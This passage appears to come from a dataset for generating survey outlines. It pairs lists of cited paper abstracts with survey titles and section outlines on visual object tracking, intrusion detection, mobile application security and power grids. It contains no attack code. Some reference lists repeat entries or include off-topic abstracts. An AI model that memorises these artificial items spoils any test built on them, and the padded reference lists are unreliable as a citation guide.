while the tracking develops. In our case, the discriminant functions are efficiently trained online using a differential version of Linear Discriminant Analysis (LDA). Object detection is performed by maximizing the sum of all discriminant functions. The method employs two complementary sources of information: it searches for the image region similar to the target object, and simultaneously it seeks to avoid background patterns seen before. The detection result is therefore less sensitive to sudden changes in the appearance of the object than in methods relying solely on similarity to the target. The experiments show robust performance under severe changes of viewpoint or abrupt changes of lighting. --- paper_title: Tracking low resolution objects by metric preservation paper_content: Tracking low resolution (LR) targets is a practical yet quite challenging problem in real applications. The loss of discriminative details in the visual appearance of the L-R targets confronts most existing visual tracking methods. Although the resolution of the LR video inputs may be enhanced by super resolution (SR) techniques, the large computational cost for high-quality SR does not make it an attractive option. This paper presents a novel solution to track LR targets without performing explicit SR. This new approach is based on discriminative metric preservation that preserves the structure in the high resolution feature space for LR matching. In addition, we integrate metric preservation with differential tracking to derive a closed-form solution to motion estimation for LR video. Extensive experiments have demonstrated the effectiveness and efficiency of the proposed approach. --- paper_title: Subclass discriminant analysis paper_content: Over the years, many discriminant analysis (DA) algorithms have been proposed for the study of high-dimensional data in a large variety of problems. Each of these algorithms is tuned to a specific type of data distribution (that which best models the problem at hand). Unfortunately, in most problems the form of each class pdf is a priori unknown, and the selection of the DA algorithm that best fits our data is done over trial-and-error. Ideally, one would like to have a single formulation which can be used for most distribution types. This can be achieved by approximating the underlying distribution of each class with a mixture of Gaussians. In this approach, the major problem to be addressed is that of determining the optimal number of Gaussians per class, i.e., the number of subclasses. In this paper, two criteria able to find the most convenient division of each class into a set of subclasses are derived. Extensive experimental results are shown using five databases. Comparisons are given against linear discriminant analysis (LDA), direct LDA (DLDA), heteroscedastic LDA (HLDA), nonparametric DA (NDA), and kernel-based LDA (K-LDA). We show that our method is always the best or comparable to the best --- paper_title: Order determination and sparsity-regularized metric learning adaptive visual tracking paper_content: Recent attempts of integrating metric learning in visual tracking have produced encouraging results. Instead of using fixed and pre-specified metric in visual appearance matching, these methods are able to learn and adjust the metric adaptively by finding the best projection of the feature space. Such learned metric is by design the best to discriminate the target of interest and its distracters from the background. However, an important issue remained unaddressed is how we can determine the optimal dimensionality of the projection to achieve best discrimination. Using inappropriate dimensions for the projection is likely to result in larger classification error, or higher computational costs and over-fitting. This paper presents a novel solution to this structural order determination problem, by introducing sparsity regularization for metric learning (or SRML). This regularization leads to the lowest possible dimensionality of the projection and thus determining the best order. This can actually be viewed as the minimum description length regularization in metric learning. The experiments validate this new approach on standard benchmark datasets, and demonstrate its effectiveness in visual tracking applications. --- paper_title: Graph Based Discriminative Learning for Robust and Efficient Object Tracking paper_content: Object tracking is viewed as a two-class 'one-versus-rest' classification problem, in which the sample distribution of the target is approximately Gaussian while the background samples are often multimodal. Based on these special properties, we propose a graph embedding based discriminative learning method, in which the topology structures of graphs are carefully designed to reflect the properties of the sample distributions. This method can simultaneously learn the subspace of the target and its local discriminative structure against the background. Moreover, a heuristic negative sample selection scheme is adopted to make the classification more effective. In tracking procedure, the graph based learning is embedded into a Bayesian inference framework cascaded with hierarchical motion estimation, which significantly improves the accuracy and efficiency of the localization. Furthermore, an incremental updating technique for the graphs is developed to capture the changes in both appearance and illumination. Experimental results demonstrate that, compared with two state-of-the-art methods, the proposed tracking algorithm is more efficient and effective, especially in dynamically changing and clutter scenes. --- paper_title: Adaptive Subclass Discriminant Analysis Color Space Learning for Visual Tracking paper_content: A robust tracking method using subclass discriminant analysis (SDA) color space is presented. SDA color space is proposed which seeks to find the color subspace for representing pixels by maximizing the distance between the foreground pixels and background pixels even if target and background have multi-model color distributions. Further, SDA color space is adaptively updated by only using "confident" target pixels. Experimental results on several challenging videos show the effectiveness of the proposed method. --- paper_title: Bag of Features Tracking paper_content: In this paper, we propose a visual tracking approach based on "bag of features" (BoF) algorithm. We randomly sample image patches within the object region in training frames for constructing two codebooks using RGB and LBP features, instead of only one codebook in traditional BoF. Tracking is accomplished by searching for the highest similarity between candidates and codebooks. Besides, updating mechanism and result refinement scheme are included in BoF tracking. We fuse patch-based approach and global template-based approach into a unified framework. Experiments demonstrate that our approach is robust in handling occlusion, scaling and rotation. --- paper_title: On-line Adaption of Class-specific Codebooks for Instance Tracking paper_content: In this work, we demonstrate that an off-line trained class-specific detector can be transformed into an instance-specific detector on-the-fly. To this end, we make use of a codebook-based detector [1] that is trained on an object class. Codebooks model the spatial distribution and appearance of object parts. When matching an image against a codebook, a certain set of codebook entries is activated to cast probabilistic votes for the object. For a given object hypothesis, one can collect the entries that voted for the object. In our case, these entries can be regarded as a signature for the target of interest. Since a change of pose and appearance can lead to an activation of very different codebook entries, we learn the statistics for the target and the background over time, i.e. we learn on-line the probability of each part in the codebook belonging to the target. By taking the target-specific statistics into account for voting, the target can be distinguished from other instances in the background yielding a higher detection confidence for the target, see Fig. 1. A class-specific codebook as in [1, 2, 3, 4, 5] is trained off-line to identify any instance of the class in any image. It models the probability of the patches belonging to the object class p ( c=1|L ) and the local spatial distribution of the patches with respect to the object center p ( x|c=1,L ) . For detection, patches are sampled from an image and matched against the codebook, i.e. each patch P(y) sampled from image location y ends at a leaf L(y). The probability for an instance of the class centered at the location x is then given by --- paper_title: People-tracking-by-detection and people-detection-by-tracking paper_content: Both detection and tracking people are challenging problems, especially in complex real world scenes that commonly involve multiple people, complicated occlusions, and cluttered or even moving backgrounds. People detectors have been shown to be able to locate pedestrians even in complex street scenes, but false positives have remained frequent. The identification of particular individuals has remained challenging as well. Tracking methods are able to find a particular individual in image sequences, but are severely challenged by real-world scenarios such as crowded street scenes. In this paper, we combine the advantages of both detection and tracking in a single framework. The approximate articulation of each person is detected in every frame based on local features that model the appearance of individual body parts. Prior knowledge on possible articulations and temporal coherency within a walking cycle are modeled using a hierarchical Gaussian process latent variable model (hGPLVM). We show how the combination of these results improves hypotheses for position and articulation of each person in several subsequent frames. We present experimental results that demonstrate how this allows to detect and track multiple people in cluttered scenes with reoccurring occlusions. --- paper_title: Generalized Kernel-based Visual Tracking paper_content: Kernel-based mean shift (MS) trackers have proven to be a promising alternative to stochastic particle filtering trackers. Despite its popularity, MS trackers have two fundamental drawbacks: 1) the template model can only be built from a single image, and 2) it is difficult to adaptively update the template model. In this paper, we generalize the plain MS trackers and attempt to overcome these two limitations. It is well known that modeling and maintaining a representation of a target object is an important component of a successful visual tracker. However, little work has been done on building a robust template model for kernel-based MS tracking. In contrast to building a template from a single frame, we train a robust object representation model from a large amount of data. Tracking is viewed as a binary classification problem, and a discriminative classification rule is learned to distinguish between the object and background. We adopt a support vector machine for training. The tracker is then implemented by maximizing the classification score. An iterative optimization scheme very similar to MS is derived for this purpose. Compared with the plain MS tracker, it is now much easier to incorporate online template adaptation to cope with inherent changes during the course of tracking. To this end, a sophisticated online support vector machine is used. We demonstrate successful localization and tracking on various data sets. --- paper_title: Generative versus discriminative methods for object recognition paper_content: Many approaches to object recognition are founded on probability theory, and can be broadly characterized as either generative or discriminative according to whether or not the distribution of the image features is modelled. Generative and discriminative methods have very different characteristics, as well as complementary strengths and weaknesses. In this paper we introduce new generative and discriminative models for object detection and classification based on weakly labelled training data. We use these models to illustrate the relative merits of the two approaches in the context of a data set of widely varying images of non-rigid objects (animals). Our results support the assertion that neither approach alone will be sufficient for large scale object recognition, and we discuss techniques for combining them. --- paper_title: Visual Tracker Using Sequential Bayesian Learning: Discriminative, Generative, and Hybrid paper_content: This paper presents a novel solution to track a visual object under changes in illumination, viewpoint, pose, scale, and occlusion. Under the framework of sequential Bayesian learning, we first develop a discriminative model-based tracker with a fast relevance vector machine algorithm, and then, a generative model-based tracker with a novel sequential Gaussian mixture model algorithm. Finally, we present a three-level hierarchy to investigate different schemes to combine the discriminative and generative models for tracking. The presented hierarchical model combination contains the learner combination (at level one), classifier combination (at level two), and decision combination (at level three). The experimental results with quantitative comparisons performed on many realistic video sequences show that the proposed adaptive combination of discriminative and generative models achieves the best overall performance. Qualitative comparison with some state-of-the-art methods demonstrates the effectiveness and efficiency of our method in handling various challenges during tracking. --- paper_title: Combining Generative and Discriminative Methods for Pixel Classification with Multi-Conditional Learning paper_content: It is possible to broadly characterize two approaches to probabilistic modeling in terms of generative and discriminative methods. Provided with sufficient training data the discriminative approach is expected to yield superior accuracy as compared to the analogous generative model since no modeling power is expended on the marginal distribution of the features. Conversely, if the model is accurate the generative approach can perform better with less data. In general it is less vulnerable to overfitting and allows one to more easily specify meaningful priors on the model parameters. We investigate multi-conditional learning - a method combining the merits of both approaches. Through specifying a joint distribution over classes and features we derive a family of models with analogous parameters. Parameter estimates are found by optimizing an objective function consisting of a weighted combination of conditional log-likelihoods. Systematic experiments in the context of foreground/background pixel classification with the Microsoft-Berkeley segmentation database using mixtures of factor analyzers illustrate tradeoffs between classifier complexity, the amount of training data and generalization accuracy. We show experimentally that this approach can lead to models with better generalization performance than purely generative or discriminative approaches --- paper_title: Identifying individuals in video by combining 'generative' and discriminative head models paper_content: The objective of this work is automatic detection and identification of individuals in unconstrained consumer video, given a minimal number of labelled faces as training data. Whilst much work has been done on (mainly frontal) face detection and recognition, current methods are not sufficiently robust to deal with the wide variations in pose and appearance found in such video. These include variations in scale, illumination, expression, partial occlusion, motion blur, etc. We describe two areas of innovation: the first is to capture the 3-D appearance of the entire head, rather than just the face region, so that visual features such as the hairline can be exploited. The second is to combine discriminative and 'generative' approaches for detection and recognition. Images rendered using the head model are used to train a discriminative tree-structured classifier giving efficient detection and pose estimates over a very wide pose range with three degrees of freedom. Subsequent verification of the identity is obtained using the head model in a 'generative' framework. We demonstrate excellent performance in detecting and identifying three characters and their poses in a TV situation comedy --- paper_title: Tracking Nonstationary Visual Appearances by Data-Driven Adaptation paper_content: Without any prior about the target, the appearance is usually the only cue available in visual tracking. However, in general, the appearances are often nonstationary which may ruin the predefined visual measurements and often lead to tracking failure in practice. Thus, a natural solution is to adapt the observation model to the nonstationary appearances. However, this idea is threatened by the risk of adaptation drift that originates in its ill-posed nature, unless good data-driven constraints are imposed. Different from most existing adaptation schemes, we enforce three novel constraints for the optimal adaptation: (1) negative data, (2) bottom-up pair-wise data constraints, and (3) adaptation dynamics. Substantializing the general adaptation problem as a subspace adaptation problem, this paper presents a closed-form solution as well as a practical iterative algorithm for subspace tracking. Extensive experiments have demonstrated that the proposed approach can largely alleviate adaptation drift and achieve better tracking results for a large variety of nonstationary scenes. --- paper_title: Online learning of probabilistic appearance manifolds for video-based recognition and tracking paper_content: This paper presents an online learning algorithm to construct from video sequences an image-based representation that is useful for recognition and tracking. For a class of objects (e.g., human faces), a generic representation of the appearances of the class is learned off-line. From video of an instance of this class (e.g., a particular person), an appearance model is incrementally learned on-line using the prior generic model and successive frames from the video. More specifically, both the generic and individual appearances are represented as an appearance manifold that is approximated by a collection of sub-manifolds (named pose manifolds) and the connectivity between them. In turn, each sub-manifold is approximated by a low-dimensional linear sub-space while the connectivity is modeled by transition probabilities between pairs of sub-manifolds. We demonstrate that our online learning algorithm constructs an effective representation for face tracking, and its use in video-based face recognition compares favorably to the representation constructed with a batch technique. --- paper_title: Online tracking and reacquisition using co-trained generative and discriminative trackers paper_content: Visual tracking is a challenging problem, as an object may change its appearance due to viewpoint variations, illumination changes, and occlusion. Also, an object may leave the field of view and then reappear. In order to track and reacquire an unknown object with limited labeling data, we propose to learn these changes online and build a model that describes all seen appearance while tracking. To address this semi-supervised learning problem, we propose a co-training based approach to continuously label incoming data and online update a hybrid discriminative generative model. The generative model uses a number of low dimension linear subspaces to describe the appearance of the object. In order to reacquire an object, the generative model encodes all the appearance variations that have been seen. A discriminative classifier is implemented as an online support vector machine, which is trained to focus on recent appearance variations. The online co-training of this hybrid approach accounts for appearance changes and allows reacquisition of an object after total occlusion. We demonstrate that under challenging situations, this method has strong reacquisition ability and robustness to distracters in background. --- paper_title: Point matching under large image deformations and illumination changes paper_content: To solve the general point correspondence problem in which the underlying transformation between image patches is represented by a homography, a solution based on extensive use of first order differential techniques is proposed. We integrate in a single robust M-estimation framework the traditional optical flow method and matching of local color distributions. These distributions are computed with spatially oriented kernels in the 5D joint spatial/color space. The estimation process is initiated at the third level of a Gaussian pyramid, uses only local information, and the illumination changes between the two images are also taken into account. Subpixel matching accuracy is achieved under large projective distortions significantly exceeding the performance of any of the two components alone. As an application, the correspondence algorithm is employed in oriented tracking of objects. --- paper_title: Incremental Learning for Robust Visual Tracking paper_content: Visual tracking, in essence, deals with non-stationary image streams that change over time. While most existing algorithms are able to track objects well in controlled environments, they usually fail in the presence of significant variation of the object's appearance or surrounding illumination. One reason for such failures is that many algorithms employ fixed appearance models of the target. Such models are trained using only appearance data available before tracking begins, which in practice limits the range of appearances that are modeled, and ignores the large volume of information (such as shape changes or specific lighting conditions) that becomes available during tracking. In this paper, we present a tracking method that incrementally learns a low-dimensional subspace representation, efficiently adapting online to changes in the appearance of the target. The model update, based on incremental algorithms for principal component analysis, includes two important features: a method for correctly updating the sample mean, and a forgetting factor to ensure less modeling power is expended fitting older observations. Both of these features contribute measurably to improving overall tracking performance. Numerous experiments demonstrate the effectiveness of the proposed tracking algorithm in indoor and outdoor environments where the target objects undergo large changes in pose, scale, and illumination. ---
Title: A Survey of Appearance Models in Visual Object Tracking Section 1: INTRODUCTION Description 1: Discuss the main goals of computer vision, the importance of visual object tracking, its applications, and challenges. Section 2: Overview of Visual Object Tracking Description 2: Describe the basic components of a visual object tracking system, including object initialization, appearance modeling, motion estimation, and object localization. Section 3: Challenges in Developing Robust Appearance Models Description 3: Identify the challenges in visual object tracking such as low-quality camera inputs, nonrigid object tracking, real-time processing requirements, and variations in object appearance. Section 4: ORGANIZATION OF THIS SURVEY Description 4: Explain the organization and structure of the survey, including the two main focus areas: visual representation and statistical modeling. Section 5: Main Differences from Other Related Surveys Description 5: Compare and contrast this survey with other related surveys in the field of visual object tracking, highlighting the unique contributions and focus areas. Section 6: Contributions of this Survey Description 6: Summarize the key contributions of the survey in reviewing literature on visual representations and statistical modeling schemes. Section 7: Global Visual Representation Description 7: Detail various global visual representation techniques including raw pixel representation, optical flow, histograms, and more. Section 8: Local Feature-Based Visual Representation Description 8: Discuss different local feature-based representations like SIFT, MSER, SURF, and corner features. Section 9: Discussion on Global and Local Visual Representations Description 9: Compare and contrast the strengths and weaknesses of global and local visual representation techniques. Section 10: STATISTICAL MODELING FOR TRACKING-BY-DETECTION Description 10: Discuss the role of statistical modeling in tracking-by-detection and classify them into generative, discriminative, and hybrid models. Section 11: Mixture Generative Appearance Models Description 11: Explain mixture generative appearance models like WSL mixture models and Gaussian mixture models. Section 12: Kernel-Based Generative Appearance Models (KGAMs) Description 12: Describe kernel-based generative models and their different branches including color-driven, shape-integration, and scale-aware models. Section 13: Subspace Learning-Based Generative Appearance Models (SLGAMs) Description 13: Discuss subspace learning techniques for visual object tracking, including linear and nonlinear subspace models. Section 14: Boosting-Based Discriminative Appearance Models Description 14: Present boosting-based discriminative models and their learning strategies, categorized into self-learning and co-learning models. Section 15: SVM-Based Discriminative Appearance Models (SDAMs) Description 15: Explain SVM-based discriminative models, focusing on their kernel selection and self-learning versus co-learning strategies. Section 16: Randomized Learning-Based Discriminative Appearance Models (RLDAMs) Description 16: Introduce randomized learning techniques like Random Forest and their application in visual object tracking. Section 17: Discriminant Analysis-Based Discriminative Appearance Models (DADAMs) Description 17: Discuss discriminant analysis techniques for supervised subspace learning and their applications in tracking. Section 18: Codebook Learning-Based Discriminative Appearance Models (CLDAMs) Description 18: Explain how codebooks are constructed for capturing dynamic appearance information from foreground and background. Section 19: Hybrid Generative-Discriminative Appearance Models (HGDAMs) Description 19: Discuss hybrid models that combine the strengths of generative and discriminative models in single-layer or multilayer combinations. Section 20: BENCHMARK RESOURCES FOR VISUAL OBJECT TRACKING Description 20: Provide information on available resources for evaluating the performance of tracking algorithms, including datasets, ground truth, and comparative evaluations. Section 21: CONCLUSION AND FUTURE DIRECTIONS Description 21: Summarize the key findings and suggest future research directions, addressing issues like robustness vs accuracy, 2D/3D information fusion, intelligent vision models, and low-frame-rate tracking.
Intrusion Detection based on K-Means Clustering and Ant Colony Optimization: A Survey
6
--- paper_title: High-Performance Intrusion Detection Using OptiGrid Clustering and Grid-Based Labelling paper_content: This research aims to construct a high-performance anomaly based intrusion detection system. Most of past studies of anomaly based IDS adopt k-means based clustering, this paper points out that the following reasons cause performance degradation of k-means based clustering when it is deployed in real traffic environment. First, k-means based algorithms have weakness for high dimensional data. Second, in spite of non-hyper spherical distribution of normal traffic in a feature space, these algorithms can only create hyper spherical clusters. Furthermore, unsophisticated algorithms to label clusters cannot achieve high detection performance. In order to solve these issues, this paper proposes a modification of OptiGrid clustering and a cluster labelling algorithm using grids. OptiGrid has robust ability to high dimensional data. Our labelling algorithm divides the feature space into grids and labels clusters using the density of grids. The combination of these two algorithms enables a system to extract the feature of traffic data and classifies the data as attack or normal correctly. We have implemented our system and confirmed efficiency of our system by utilizing both KDDCUP1999 data sets and Kyoto 2006+ data sets. --- paper_title: Using a Dynamic K-means Algorithm to Detect Anomaly Activities paper_content: IDS (Intrusion Detection system) is an active and driving defense technology. This paper mainly focuses on intrusion detection based on clustering analysis. The aim is to improve the detection rate and decrease the false alarm rate. A modified dynamic K-means algorithm called MDKM to detect anomaly activities is proposed and corresponding simulation experiments are presented. Firstly, the MDKM algorithm filters the noise and isolated points on the data set. Secondly by calculating the distances between all sample data points, we obtain the high-density parameters and cluster-partition parameters, using dynamic iterative process we get the k clustering center accurately, then an anomaly detection model is presented. This paper used KDD CUP 1999 data set to test the performance of the model. The results show the system has a higher detection rate and a lower false alarm rate, it achieves expectant aim. --- paper_title: Intrusion detection based on K-Means clustering and Naïve Bayes classification paper_content: Intrusion Detection System (IDS) plays an effective way to achieve higher security in detecting malicious activities for a couple of years. Anomaly detection is one of intrusion detection system. Current anomaly detection is often associated with high false alarm with moderate accuracy and detection rates when it's unable to detect all types of attacks correctly. To overcome this problem, we propose an hybrid learning approach through combination of K-Means clustering and Naive Bayes classification. The proposed approach will be cluster all data into the corresponding group before applying a classifier for classification purpose. An experiment is carried out to evaluate the performance of the proposed approach using KDD Cup'99 dataset. Result show that the proposed approach performed better in term of accuracy, detection rate with reasonable false alarm rate. --- paper_title: Network programming and mining classifier for intrusion detection using probability classification paper_content: In conventional network security simply relies on mathematical algorithms and low counter measures to taken to prevent intrusion detection system, although most of this approaches in terms of theoretically challenged to implement. Therefore, a variety of algorithms have been committed to this challenge. Instead of generating large number of rules the evolution optimization techniques like Genetic Network Programming (GNP) can be used. The GNP is based on directed graph, In this paper the security issues related to deploy a data mining-based IDS in a real time environment is focused upon. We generalize the problem of GNP with association rule mining and propose a fuzzy weighted association rule mining with GNP framework suitable for both continuous and discrete attributes. Our proposal follows an Apriori algorithm based fuzzy WAR and GNP and avoids pre and post processing thus eliminating the extra steps during rules generation. This method can sufficient to evaluate misuse and anomaly detection. Experiments on KDD99Cup and DARPA98 data show the high detection rate and accuracy compared with other conventional method. --- paper_title: Anomaly Intrusion Detection Method Based on K-Means Clustering Algorithm with Particle Swarm Optimization paper_content: K-means clustering algorithm is an effective method that has been proved for apply to the intrusion detection system. Particle swarm optimization (PSO) algorithm which is evolutionary computation technology based on swarm intelligence has good global search ability. With the deficiency of global search ability for K-means clustering algorithm, we propose a K-means clustering algorithm based on particle swarm optimization (PSO-KM) in this paper. The proposed algorithm has overcome falling into local minima and has relatively good overall convergence. Experiments on data sets KDD CUP 99 has shown the effectiveness of the proposed method and also shows the method has higher detection rate and lower false detection rate. --- paper_title: Intrusion detection based on K-Means clustering and Naïve Bayes classification paper_content: Intrusion Detection System (IDS) plays an effective way to achieve higher security in detecting malicious activities for a couple of years. Anomaly detection is one of intrusion detection system. Current anomaly detection is often associated with high false alarm with moderate accuracy and detection rates when it's unable to detect all types of attacks correctly. To overcome this problem, we propose an hybrid learning approach through combination of K-Means clustering and Naive Bayes classification. The proposed approach will be cluster all data into the corresponding group before applying a classifier for classification purpose. An experiment is carried out to evaluate the performance of the proposed approach using KDD Cup'99 dataset. Result show that the proposed approach performed better in term of accuracy, detection rate with reasonable false alarm rate. --- paper_title: Ant Algorithms for Discrete Optimization paper_content: This article presents an overview of recent work on ant algorithms, that is, algorithms for discrete optimization that took inspiration from the observation of ant colonies' foraging behavior, and introduces the ant colony optimization (ACO) metaheuristic. In the first part of the article the basic biological findings on real ants are reviewed and their artificial counterparts as well as the ACO metaheuristic are defined. In the second part of the article a number of applications of ACO algorithms to combinatorial optimization and routing in communications networks are described. We conclude with a discussion of related work and of some of the most important aspects of the ACO metaheuristic. --- paper_title: Intrusion detection based on K-Means clustering and Naïve Bayes classification paper_content: Intrusion Detection System (IDS) plays an effective way to achieve higher security in detecting malicious activities for a couple of years. Anomaly detection is one of intrusion detection system. Current anomaly detection is often associated with high false alarm with moderate accuracy and detection rates when it's unable to detect all types of attacks correctly. To overcome this problem, we propose an hybrid learning approach through combination of K-Means clustering and Naive Bayes classification. The proposed approach will be cluster all data into the corresponding group before applying a classifier for classification purpose. An experiment is carried out to evaluate the performance of the proposed approach using KDD Cup'99 dataset. Result show that the proposed approach performed better in term of accuracy, detection rate with reasonable false alarm rate. --- paper_title: Intrusion detection based on K-Means clustering and Naïve Bayes classification paper_content: Intrusion Detection System (IDS) plays an effective way to achieve higher security in detecting malicious activities for a couple of years. Anomaly detection is one of intrusion detection system. Current anomaly detection is often associated with high false alarm with moderate accuracy and detection rates when it's unable to detect all types of attacks correctly. To overcome this problem, we propose an hybrid learning approach through combination of K-Means clustering and Naive Bayes classification. The proposed approach will be cluster all data into the corresponding group before applying a classifier for classification purpose. An experiment is carried out to evaluate the performance of the proposed approach using KDD Cup'99 dataset. Result show that the proposed approach performed better in term of accuracy, detection rate with reasonable false alarm rate. --- paper_title: MINING LUNG CANCER DATA AND OTHER DISEASES DATA USING DATA MINING TECHNIQUES: A SURVEY paper_content: If you think about the dangerous diseases in the world then you always list Cancer as one. Lung cancer is one of the most dangerous cancer types in the world. These diseases can spread by uncontrolled cell growth in tissues of the lung. Early detection can save the life and survivability of the patients. In this paper we survey several aspects of data mining which is used for lung cancer prediction. Data mining is useful in lung cancer classification. We also survey the aspects of ant colony optimization (ACO) technique. Ant colony optimization helps in increasing or decreasing the disease prediction value. This study assorted data mining and ant colony optimization techniques for appropriate rule generation and classification, which pilot to exact cancer classification. In addition to, it provides basic framework for further improvement in medical diagnosis. --- paper_title: Extraction of Significant Patterns from Heart Disease Warehouses for Heart Attack Prediction paper_content: Summary The diagnosis of diseases is a significant and tedious task in medicine. The detection of heart disease from various factors or symptoms is a multi-layered issue which is not free from false presumptions often accompanied by unpredictable effects. Thus the effort to utilize knowledge and experience of numerous specialists and clinical screening data of patients collected in databases to facilitate the diagnosis process is considered a valuable option. The healthcare industry gathers enormous amounts of heart disease data that regrettably, are not “mined” to determine concealed information for effective decision making by healthcare practitioners. In this paper, we have proposed an efficient approach for the extraction of significant patterns from the heart disease warehouses for heart attack prediction. Initially, the data warehouse is preprocessed to make it appropriate for the mining process. After preprocessing, the heart disease warehouse is clustered using the K-means clustering algorithm, which will extract the data relevant to heart attack from the warehouse. Subsequently the frequent patterns are mined from the extracted data, relevant to heart disease, using the MAFIA algorithm. Then the significant weightage of the frequent patterns are calculated. Further, the patterns significant to heart attack prediction are chosen based on the calculated significant weightage. These significant patterns can be used in the development of heart attack prediction system. --- paper_title: A multiagent system using associate rule mining (ARM), a Collaborative filtering approach paper_content: Agent Oriented Programming (AOP) is a recent promising software paradigm that brings concepts from the theories of artificial intelligence into the mainstream realm of distributed systems, and yet it is rather difficult to find a successful application of agent oriented system (specifically) when large-scale systems are considered. When adopting an agent-oriented approach to solve a problem, there are a number of domain independent issues that must always be solved, such as how to model agent behavior to predict future action and how to allow agents to communicate rather than expecting developers to develop this core infrastructure themselves. In our paper, we address several problems that exist in a socialized e-learning environment and provide solutions to these problems through smart and collaborative agent behavior modeling which learn and adapt themselves through prior experiences, thereby assisting in successful implementation of this large scale e-learning system. In this paper, the author (s) proposes an implementation of a complete distributed e-learning system based on Collaborative filtering (CF) method. The system has intelligent collaborative filtering based tutoring system (ICFTS) capabilities that allow contents, presentation and navigation to be adapted according to the learner's requirements. In order to achieve that development, two concepts were put together: multi-agent systems and data mining techniques (specifically, the ARM algorithm). All the implementation code is developed using MATLAB GUI environment. To our best knowledge, very few literatures discusses a portion of e-learning environment using adaptive software agents, but none of the current literatures addresses a complete implementation of their learning system in detail. The goal of the paper is to implement one such multi-agent based e-learning system which learns from its prior user experiences on top of an agent-oriented middleware that provides the domain-independent infrastructure, allowing the developers to focus on building the key logic behind it. In this system, the agents follow an adaptive cognitive learning approach, where the agent learns through user behaviors via a collaborative filtering technique, or experiencing and then processing and remembering the information in an e-learning environment. The paper will utilize agent (a piece of code) based environment in our e-learning system using ARM [1][2]. The paper follows a learning approach based cognitive domain of Bloom's Taxonomy such as Analyze, Evaluate, Create, Apply, understand and remember. --- paper_title: Probable Sequence Determination Using Incremental Association Rule Mining and Transaction Clustering paper_content: Many organizations collect information about customers which are used to support various business related task. The detail of the customers and their behavior is stored in the database. Here we propose a method of using incremental updating technique to mine direct association rules Inter & Intra transactions. Cluster analysis is performed to verify the associated objects fall in nominal cluster. The result of this technique can be used to develop well structured e-shop which facilitate the customer by helping him to find what he wants in a specialized way and also aids him to choose the associated products by the method of prediction. Thus it reduces the workload of marketing professional to provide direct marketing and thereby providing customer satisfaction. --- paper_title: Apriori and Ant Colony Optimization of Association Rules paper_content: Association Rule mining is one of the important and most popular data mining technique. Association rule mining can be efficiently used in any decision making processor decision based rule generation. In this paper we present an efficient mining based optimization techniques for rule generation. By using apriori algorithm we find the positive and negative association rules. Then we apply ant colony optimization algorithm (ACO) for optimizing the association rules. Our results show the effectiveness of our approach. --- paper_title: A formal immune network and its implementation for on-line intrusion detection paper_content: This paper presents a mathematical model of immune network specified for real-time intrusion detection. A software implementation of the model has been tested on data simulating a typical US Air Force local area network (LAN). The obtained results suggest that the performance of the model is unachievable for other approaches of computational intelligence. A hardware implementation of the model is proposed based on digital signal processor (DSP) of super Harvard architecture (SHARC). --- paper_title: Intrusion detection based on K-Means clustering and Naïve Bayes classification paper_content: Intrusion Detection System (IDS) plays an effective way to achieve higher security in detecting malicious activities for a couple of years. Anomaly detection is one of intrusion detection system. Current anomaly detection is often associated with high false alarm with moderate accuracy and detection rates when it's unable to detect all types of attacks correctly. To overcome this problem, we propose an hybrid learning approach through combination of K-Means clustering and Naive Bayes classification. The proposed approach will be cluster all data into the corresponding group before applying a classifier for classification purpose. An experiment is carried out to evaluate the performance of the proposed approach using KDD Cup'99 dataset. Result show that the proposed approach performed better in term of accuracy, detection rate with reasonable false alarm rate. ---
Title: Intrusion Detection based on K-Means Clustering and Ant Colony Optimization: A Survey Section 1: Literature Survey Description 1: This section discusses the various research works on intrusion detection, including the methods and results reported by different authors. Section 2: Problem Domain Description 2: This section identifies the gaps and challenges in traditional intrusion detection approaches, highlighting the need for improved hybrid systems. Section 3: Analysis Description 3: This section provides a comparative analysis of different research works to identify the areas where detection mechanisms perform weakly. Section 4: Optimized Association Description 4: This section explains the role of association rule mining in detecting patterns, how it can be optimized, and its applications in different sectors. Section 5: Proposed Work Description 5: This section describes the proposed approach for intrusion detection using K-Means clustering combined with Ant Colony Optimization, including an illustrative example and methodology. Section 6: Conclusion and Future Work Description 6: This section summarizes the findings, discusses the advantages and disadvantages of various techniques, and proposes future research directions for enhancing intrusion detection systems.
Mobile Application Security Platforms Survey
9
---
<format> Title: Mobile Application Security Platforms Survey Section 1: Introduction Description 1: Introduce the significance of mobile application security and provide background information on the current landscape of mobile security platforms. Section 2: Mobile Security Threats Description 2: Detail various security threats faced by mobile applications, including malware, phishing, data breaches, and other vulnerabilities. Section 3: Security Measures and Best Practices Description 3: Discuss prevalent security measures and best practices used to protect mobile applications from threats, including encryption, multi-factor authentication, and code obfuscation. Section 4: Security Platforms for Mobile Applications Description 4: Examine different security platforms and solutions available for mobile application security, highlighting key features and functionalities. Section 5: Comparison of Security Platforms Description 5: Provide a comparative analysis of different mobile security platforms, evaluating their strengths and weaknesses. Section 6: Case Studies Description 6: Present case studies of organizations or applications that have successfully implemented mobile security platforms, demonstrating real-world applications and outcomes. Section 7: Challenges and Limitations Description 7: Identify and discuss the challenges and limitations in the current mobile application security landscape, including technical, regulatory, and user-related issues. Section 8: Future Trends in Mobile Security Description 8: Explore emerging trends and future directions in mobile application security, such as advancements in AI-based security solutions and zero trust architectures. Section 9: Conclusion Description 9: Summarize the key findings from the survey, emphasize the importance of mobile application security, and suggest potential areas for future research and development. </format>
The Power Grid as a Complex Network: a Survey
11
--- paper_title: Emergence of scaling in random networks paper_content: Systems as diverse as genetic networks or the World Wide Web are best described as networks with complex topology. A common property of many large networks is that the vertex connectivities follow a scale-free power-law distribution. This feature was found to be a consequence of two generic mechanisms: (i) networks expand continuously by the addition of new vertices, and (ii) new vertices attach preferentially to sites that are already well connected. A model based on these two ingredients reproduces the observed stationary scale-free distributions, which indicates that the development of large networks is governed by robust self-organizing phenomena that go beyond the particulars of the individual systems. --- paper_title: Predictability and epidemic pathways in global outbreaks of infectious diseases: the SARS case study paper_content: BackgroundThe global spread of the severe acute respiratory syndrome (SARS) epidemic has clearly shown the importance of considering the long-range transportation networks in the understanding of emerging diseases outbreaks. The introduction of extensive transportation data sets is therefore an important step in order to develop epidemic models endowed with realism.MethodsWe develop a general stochastic meta-population model that incorporates actual travel and census data among 3 100 urban areas in 220 countries. The model allows probabilistic predictions on the likelihood of country outbreaks and their magnitude. The level of predictability offered by the model can be quantitatively analyzed and related to the appearance of robust epidemic pathways that represent the most probable routes for the spread of the disease.ResultsIn order to assess the predictive power of the model, the case study of the global spread of SARS is considered. The disease parameter values and initial conditions used in the model are evaluated from empirical data for Hong Kong. The outbreak likelihood for specific countries is evaluated along with the 